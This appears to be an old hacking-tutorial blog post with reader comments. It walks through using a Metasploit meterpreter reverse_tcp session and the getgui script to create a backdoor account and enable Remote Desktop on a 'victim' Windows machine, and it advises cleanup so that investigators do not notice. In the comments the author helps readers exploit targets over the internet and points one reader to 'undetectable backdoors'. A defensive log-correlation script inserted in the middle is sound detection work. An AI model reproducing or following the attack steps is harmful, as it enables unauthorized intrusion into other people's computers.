Type : Tutorial
Level : Beginner, Medium
Last year, when I was teaching a computer security class, one student came and asked, “Can you give me a simple tutorial on how to use the command prompt?” I said, “I don’t think it can be done in a short course, because to learn the command prompt you should practice every day at first and make it as familiar as your mother tongue.” From this situation I know that not everyone knows about the command prompt or anything console based. How about hacking? Yep, it’s the same… sometimes newcomers just follow tutorials without knowing what exactly they are doing.
Today I will write a simple tutorial on how to enable Remote Desktop (which uses the Remote Desktop Protocol on TCP port 3389) when you are already inside a remote system using the Metasploit Framework. This method should be useful if you are limited in how well you can use the command prompt. In this case, we will utilize Carlos Perez’s ‘getgui’ script, which enables Remote Desktop and creates a user account for you to log into it with.
2. Backtrack 5 (or another Linux OS)
1. My favourite meterpreter payload is reverse_tcp. If you also like to use reverse_tcp for your payload, you can use the command below.
set payload windows/meterpreter/reverse_tcp
2. Inside the meterpreter, execute
meterpreter > run getgui -h

to view the help.
3. To add a user with username valent and password r4h45i4 and then enable the Remote Desktop Service:
run getgui -u valent -p r4h45i4
Yep, we have successfully created the user and activated the Remote Desktop Service.
Please note the last command, “For cleanup use command : run multi_console_command….bla…bla….bla”; it will be used after you finish using the Remote Desktop Service of the victim computer.
4. To connect to the victim using remote desktop, we can use the rdesktop program (it’s already installed on Backtrack).
rdesktop -u <username> -p <password> <ip-address-target>

initializing……and then….
5. You should also remember that when you add a user, you are adding one new user on the remote computer. Be wise in using this method, because when you make many changes you also leave a lot of changes on the remote computer, and they can be tracked by investigators.
To clean up the user we’ve already created before (you can see it in step 3).
Finish…
Hope it’s useful for you… any questions? Just drop them in the comment box.
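The changes that step 5 says are left on the remote computer are what a defender can watch for. The following is an added example, not part of the original tutorial or of the getgui script: it correlates account creation, membership in an RDP-capable group and the `fDenyTSConnections` registry value being set to 0 on the same host. The events are constructed, the field names and the user `helpdesk2` are assumptions, and the event IDs are those of the Security log and Sysmon on current Windows versions, not the older numbering used on XP.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from a real host); field names are simplified.
# Security 4720/4732/4624 and Sysmon 13 (registry value set) are real event IDs.
EVENTS = [
    {"t": "2024-05-01T10:00:03", "host": "WS01", "src": "Security", "id": 4720,
     "user": "helpdesk2"},
    {"t": "2024-05-01T10:00:04", "host": "WS01", "src": "Security", "id": 4732,
     "user": "helpdesk2", "group": "Remote Desktop Users"},
    {"t": "2024-05-01T10:00:05", "host": "WS01", "src": "Sysmon", "id": 13,
     "target": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"t": "2024-05-01T10:02:10", "host": "WS01", "src": "Security", "id": 4624,
     "user": "helpdesk2", "logon_type": 10},
    # Benign: an account is created on WS02 but RDP settings are untouched.
    {"t": "2024-05-01T11:00:00", "host": "WS02", "src": "Security", "id": 4720,
     "user": "new.hire"},
]
RDP_GROUPS = {"remote desktop users", "administrators"}

def classify(ev):
    """Map one event to a signal name, or None if it is not relevant."""
    key = (ev["src"], ev["id"])
    if key == ("Security", 4720):
        return "account_created"
    if key == ("Security", 4732) and ev.get("group", "").lower() in RDP_GROUPS:
        return "added_to_rdp_group"
    if (key == ("Sysmon", 13)
            and ev.get("target", "").lower().endswith("\\fdenytsconnections")
            and "0x00000000" in ev.get("details", "")):
        return "rdp_enabled"
    if key == ("Security", 4624) and ev.get("logon_type") == 10:
        return "rdp_logon"  # logon type 10 = RemoteInteractive
    return None

def detect(events, window=timedelta(minutes=5)):
    """Alert when RDP is switched on within `window` after an account is created."""
    sigs = [(datetime.fromisoformat(e["t"]), e["host"], classify(e), e) for e in events]
    alerts = []
    for t0, host, sig, ev in sigs:
        near = {s for t, h, s, _ in sigs
                if s and h == host and timedelta(0) <= t - t0 <= window}
        if sig == "account_created" and "rdp_enabled" in near:
            alerts.append({"host": host, "user": ev["user"], "signals": sorted(near)})
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

Only WS01 raises an alert; the account created on WS02 is ignored because Remote Desktop is never switched on there.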
Hi,
I have a beginner's Q.
where do I find the Meterpreter in BT5?
#Hagai
Firstly, you should exploit a machine first and then set the payload to use meterpreter. Please refer to this tutorial http://www.hacking-tutorial.com/computer/hacking-mozilla-firefox-3-5-to-3-6-nstreerange-vulnerability-using-metasploit/
how do we know the username and password of the victim???
and do we need to add a new user to the victim computer?
#puppet
First of all, you should find a vulnerable target… and then try to compromise it… when you successfully compromise the target, you don’t need to input any password or username
I have a problem: Unknown command: rdesktop
#mehdi
Hmm… maybe you don’t have rdesktop installed… try to run
apt-get install rdesktop.
I have a problem with rdesktop: the password was invalid, but I've double-checked the password and am still getting the error
#th3bAdh
hmm… if the password was correct it should have no error like this… maybe the password was empty or there is an issue with keyboard localization..
Thx for info….
Download RDesktop
http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz
I am using following payload:
(windows/shell/reverse_tcp):
but when I run the exploit..
after the binding, it says "Sending exploit …"
and then it returns me ….msf exploit(ms03_026_dcom) >
so nothing happens…..you know what could be the possible reason for this?
Thanks!
#josh
maybe it means that the target isn’t vulnerable.
when I write getgui – h run , run the command it says unknown ..
What should I do ?
#bagus
are you already inside the meterpreter console?
Whenever I attempt to create a shell in target computer, the handler is created on my end, but the connection times out. Why is that? Is it error on my end?
-DeusIgni
#Deuslgni
Hmm, maybe the target prevents you from creating it… it doesn’t mean that if you got meterpreter, you’ll also get the shell… it depends on the vulnerability ranking… FYI the target machine in this tutorial was XP SP0..
Is there a way to use this exploit on XP SP3?
-DeusIgni
#Deuslgni
maybe you can try this http://www.hacking-tutorial.com/computer/hacking-windows-7-sp-1-using-java-signed-applet-social-engineering-code-execution/ in your windows xp sp3
hi
I am using bt5 r2 in vmware. I am trying to remotely control my win 7 desktop. When meterpreter session -i 1 is started like
meterpreter>
when I enter the shell, pwd or cd command it gives me an error of unknown command
what should I do??
#boby
maybe the rating of the exploit you use is not an excellent one. btw if you want to try and make sure it works you can view this tutorial http://www.hacking-tutorial.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/
I am using windows/meterpreter/reverse_tcp, I have the same problem. I have tried java_signed_applet, I still have this problem " unknown command ". When I was using Backtrack 5 r1 it was working very well
Is there any installation problem, or may there be some bugs in Backtrack 5 r2???
metertreter>pwd
pwd unknoun command
same problem
#boby
Hmmm… maybe you can try to update your metasploit framework first by using the
msfupdate command.
Thank you very much for your reply…
Which tool of Backtrack 5 must be updated after installation?? And which command do I have to use???
i am using these commands
for msf
=======
1,msfupdate
for library
===========
2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
which command you have suggested me to update backtrack 5 R1 or Backtrack 5 R2 for better performance?
#boby
btw I don’t know exactly what your problem is or how you installed your BT. Maybe you can also try to update your system using
apt-get update and apt-get upgrade.
My problem is solved. Thanks for your help
what is stupidity, provide a metasploit payload when you just need to add user to a group and start a service from shell. I understand the reason you provide it but would be a lot more useful to actually explain it than just provide script kiddies…
#deff
it’s just wasting your time… 

LoL…maybe what you mean is http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
if you think like that, why didn’t you contribute by writing an “awesome tutorial” here? Or maybe give your own tutorial link… don’t just talk and criticize without action
ps : next time it’s better use your real e-mail not the fake one
merci monsieur
I have metasploit 4.4 gui comunity edition but no change to exploit. btw i have windows 7 sp1
#Puka
I don’t understand?
I have installed Backtrack on vmware and hacked my windows 7 system with the system internal ip, but how can I set my dynamic ip to hack a computer remotely
#anonymous
read more here : http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Hi, when i tried to do the rdesktop -u ( ) -p ( ) and the ipaddress and pressed enter it says Autoselected keyboard map en-us and does not do anything…do you know why that happens?
#samuel
hmm… maybe the remote desktop service on the victim PC hasn’t started yet..
maybe you can take a look to this tutorial : http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
Thanks for your time and effort to provide tutorials!
hi
please give me a tutorial to hack a pc on another network. Please guide me
#boby
http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?
after executing this command :
run getgui -u testuser -p testpass
show me this message :
This version of Meterpreter is not supported with this Script!
what’s the problem?
#josh
maybe you can try to update the metasploit library
msfupdate.
Hi,
I want to download vanish.sh and crypter.ph for Backtrack 5 r3. I searched for it on Google but I cannot find it. Kindly give me these undetectable backdoors or a download link. I will be very thankful to you
#boby
I think you just haven’t searched for it
http://pastebin.com/7xmvGnks
No its not
I searched on the net, I found the code but it didn’t work
Thanks for your cooperation
after I type set payload windows/meterpreter/reverse_tcp the meterpreter won’t show up, why? thanks
#fahmi
you need to exploit first, and then you can get the meterpreter console. See other hacking tutorials here http://www.hacking-tutorial.com/category/hacking-tutorial/